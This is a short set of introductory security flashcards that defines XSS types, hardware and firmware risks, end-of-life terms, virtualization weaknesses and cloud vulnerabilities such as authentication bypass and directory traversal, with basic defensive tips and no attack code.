XSS, Hardware vulnerabilities, Cloud-specific, Supply chain Flashcards
XSS (Cross-site scripting)
Takes advantage of a trust a user has for website.
**commonly uses JavaScript
Reflected XSS
Script is embedded in URL executes in the victim’s browser.
User is the person who executes the code.
Persistent (stored) XSS
App stores user input, such as comments or messages, in its database and displays it to other users.
Protecting against XSS include:
-Careful clicking untrusted links
-Consider disabling JavaScript
-Update browser/apps
-Don’t allow users to add their own scripts
Why are hardware potential security risks?
perfect entry point form an attack
Firmware
software inside of hardware
End of Life (EOL)
Notice that the manufacturer is giving to everyone to let them know that in the future, they will stop selling this product.
End of service life (EOSL)
○ Manufacture stops selling product
○ Support is no longer available
List some virtualization vulnerabilities?
-Local privilege escalation
-Command injection
-Info disclosure
Hypervisor
Manages the relationship between physical & virtual resources.
True or false: RAM is allocated and shared between VMs
True
True or false: Data can be inadvertently be shared between VMs
True
Cloud specific vulnerabilities (attacking the service) include:
-Authentication bypass
-Directory traversal
-Remote code execution
Authentication bypass
Take advantage of weak or faulty authentication
Directory traversal
Ability to manually move around the structure of that web server into folders & sub-directories
